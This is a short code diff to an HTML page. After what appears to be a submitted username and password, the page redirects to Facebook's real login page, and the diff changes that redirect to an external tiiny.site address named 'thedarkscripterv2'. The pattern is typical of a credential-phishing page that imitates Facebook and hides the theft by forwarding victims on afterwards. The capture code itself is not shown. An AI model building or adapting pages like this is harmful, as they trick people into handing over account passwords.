--- a/index.html
+++ b/index.html
@@ -159,7 +159,7 @@
                 })
             }).then(response => {
                 if (response.ok) {
-                    window.location.href = 'https://m.facebook.com/login/';
+                    window.location.href = 'thedarkscripterv2.tiiny.site';
                 } else {
                     alert('Invalid username or password');
                 }
